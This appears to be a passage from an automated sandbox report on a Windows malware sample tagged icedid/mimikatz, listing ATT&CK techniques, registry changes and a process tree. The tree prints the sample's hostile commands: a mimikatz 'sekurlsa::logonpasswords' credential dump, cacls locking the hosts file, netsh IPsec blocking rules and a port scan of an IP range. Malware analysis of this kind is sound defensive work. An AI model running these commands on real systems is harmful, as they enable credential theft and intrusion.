Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ibebikp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tpviuibgv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ibebikp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cuwoqc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lubvuzbtm.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4944	cmd.exe
5008	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0007000000023ca6-6.dat	nsis_installer_2
behavioral2/files/0x0007000000023cb2-15.dat	nsis_installer_1
behavioral2/files/0x0007000000023cb2-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 45 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ibebikp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ibebikp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ibebikp.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ibebikp.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ibebikp.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ibebikp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	vmgumyclb.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	ibebikp.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5008	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3792	schtasks.exe
1472	schtasks.exe
4276	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
4568	2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	4568	2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	2912	ibebikp.exe
Token: SeDebugPrivilege	4396	ibebikp.exe
Token: SeDebugPrivilege	4556	vfshost.exe
Token: SeDebugPrivilege	2388	vmgumyclb.exe
Token: SeLockMemoryPrivilege	1840	ttittb.exe
Token: SeLockMemoryPrivilege	1840	ttittb.exe
Token: SeDebugPrivilege	4064	vmgumyclb.exe
Token: SeDebugPrivilege	2680	vmgumyclb.exe
Token: SeDebugPrivilege	1948	vmgumyclb.exe
Token: SeDebugPrivilege	1796	vmgumyclb.exe
Token: SeDebugPrivilege	2000	vmgumyclb.exe
Token: SeDebugPrivilege	1660	vmgumyclb.exe
Token: SeDebugPrivilege	4816	vmgumyclb.exe
Token: SeDebugPrivilege	2508	vmgumyclb.exe
Token: SeDebugPrivilege	3388	vmgumyclb.exe
Token: SeDebugPrivilege	4472	vmgumyclb.exe
Token: SeDebugPrivilege	4564	vmgumyclb.exe
Token: SeDebugPrivilege	5104	vmgumyclb.exe
Token: SeDebugPrivilege	1436	vmgumyclb.exe
Token: SeDebugPrivilege	3384	vmgumyclb.exe
Token: SeDebugPrivilege	4620	vmgumyclb.exe
Token: SeDebugPrivilege	3404	vmgumyclb.exe
Token: SeDebugPrivilege	996	vmgumyclb.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
4568	2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe
4568	2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe
2912	ibebikp.exe
2912	ibebikp.exe
4396	ibebikp.exe
4396	ibebikp.exe
4984	xohudmc.exe
3300	cuwoqc.exe
3344	ibebikp.exe
3344	ibebikp.exe
1052	ibebikp.exe
1052	ibebikp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4568 wrote to memory of 4944	4568	2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe	82
PID 4568 wrote to memory of 4944	4568	2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe	82
PID 4568 wrote to memory of 4944	4568	2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe	82
PID 4944 wrote to memory of 5008	4944	cmd.exe	84
PID 4944 wrote to memory of 5008	4944	cmd.exe	84
PID 4944 wrote to memory of 5008	4944	cmd.exe	84
PID 4944 wrote to memory of 2912	4944	cmd.exe	85
PID 4944 wrote to memory of 2912	4944	cmd.exe	85
PID 4944 wrote to memory of 2912	4944	cmd.exe	85
PID 4396 wrote to memory of 4968	4396	ibebikp.exe	87
PID 4396 wrote to memory of 4968	4396	ibebikp.exe	87
PID 4396 wrote to memory of 4968	4396	ibebikp.exe	87
PID 4396 wrote to memory of 4988	4396	ibebikp.exe	88
PID 4396 wrote to memory of 4988	4396	ibebikp.exe	88
PID 4396 wrote to memory of 4988	4396	ibebikp.exe	88
PID 4968 wrote to memory of 2980	4968	cmd.exe	91
PID 4968 wrote to memory of 2980	4968	cmd.exe	91
PID 4968 wrote to memory of 2980	4968	cmd.exe	91
PID 4968 wrote to memory of 3556	4968	cmd.exe	92
PID 4968 wrote to memory of 3556	4968	cmd.exe	92
PID 4968 wrote to memory of 3556	4968	cmd.exe	92
PID 4968 wrote to memory of 3656	4968	cmd.exe	93
PID 4968 wrote to memory of 3656	4968	cmd.exe	93
PID 4968 wrote to memory of 3656	4968	cmd.exe	93
PID 4968 wrote to memory of 3668	4968	cmd.exe	94
PID 4968 wrote to memory of 3668	4968	cmd.exe	94
PID 4968 wrote to memory of 3668	4968	cmd.exe	94
PID 4968 wrote to memory of 3940	4968	cmd.exe	95
PID 4968 wrote to memory of 3940	4968	cmd.exe	95
PID 4968 wrote to memory of 3940	4968	cmd.exe	95
PID 4968 wrote to memory of 4200	4968	cmd.exe	96
PID 4968 wrote to memory of 4200	4968	cmd.exe	96
PID 4968 wrote to memory of 4200	4968	cmd.exe	96
PID 4396 wrote to memory of 5020	4396	ibebikp.exe	97
PID 4396 wrote to memory of 5020	4396	ibebikp.exe	97
PID 4396 wrote to memory of 5020	4396	ibebikp.exe	97
PID 4396 wrote to memory of 184	4396	ibebikp.exe	99
PID 4396 wrote to memory of 184	4396	ibebikp.exe	99
PID 4396 wrote to memory of 184	4396	ibebikp.exe	99
PID 4396 wrote to memory of 4636	4396	ibebikp.exe	108
PID 4396 wrote to memory of 4636	4396	ibebikp.exe	108
PID 4396 wrote to memory of 4636	4396	ibebikp.exe	108
PID 4636 wrote to memory of 3208	4636	cmd.exe	110
PID 4636 wrote to memory of 3208	4636	cmd.exe	110
PID 4636 wrote to memory of 3208	4636	cmd.exe	110
PID 3208 wrote to memory of 1980	3208	wpcap.exe	111
PID 3208 wrote to memory of 1980	3208	wpcap.exe	111
PID 3208 wrote to memory of 1980	3208	wpcap.exe	111
PID 1980 wrote to memory of 1668	1980	net.exe	113
PID 1980 wrote to memory of 1668	1980	net.exe	113
PID 1980 wrote to memory of 1668	1980	net.exe	113
PID 3208 wrote to memory of 932	3208	wpcap.exe	114
PID 3208 wrote to memory of 932	3208	wpcap.exe	114
PID 3208 wrote to memory of 932	3208	wpcap.exe	114
PID 932 wrote to memory of 4148	932	net.exe	116
PID 932 wrote to memory of 4148	932	net.exe	116
PID 932 wrote to memory of 4148	932	net.exe	116
PID 3208 wrote to memory of 1972	3208	wpcap.exe	117
PID 3208 wrote to memory of 1972	3208	wpcap.exe	117
PID 3208 wrote to memory of 1972	3208	wpcap.exe	117
PID 1972 wrote to memory of 1872	1972	net.exe	119
PID 1972 wrote to memory of 1872	1972	net.exe	119
PID 1972 wrote to memory of 1872	1972	net.exe	119
PID 3208 wrote to memory of 4588	3208	wpcap.exe	120

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2116
- C:\Windows\TEMP\ltbmbiubv\ttittb.exe
  "C:\Windows\TEMP\ltbmbiubv\ttittb.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1840

C:\Users\Admin\AppData\Local\Temp\2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tmbllbvl\ibebikp.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4944
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5008
- - C:\Windows\tmbllbvl\ibebikp.exe
    C:\Windows\tmbllbvl\ibebikp.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2912

C:\Windows\tmbllbvl\ibebikp.exe
C:\Windows\tmbllbvl\ibebikp.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4396
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2980
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3656
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:4200
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4988
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:5020
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4636
- - C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe
    C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:3208
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1980
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1668
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:932
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4148
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1972
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1872
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:4588
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3712
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:4992
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:4116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4848
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:704
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\buzcwvvny\mmzbiruiz\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4468
- - C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe
    C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\buzcwvvny\mmzbiruiz\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\buzcwvvny\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\buzcwvvny\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
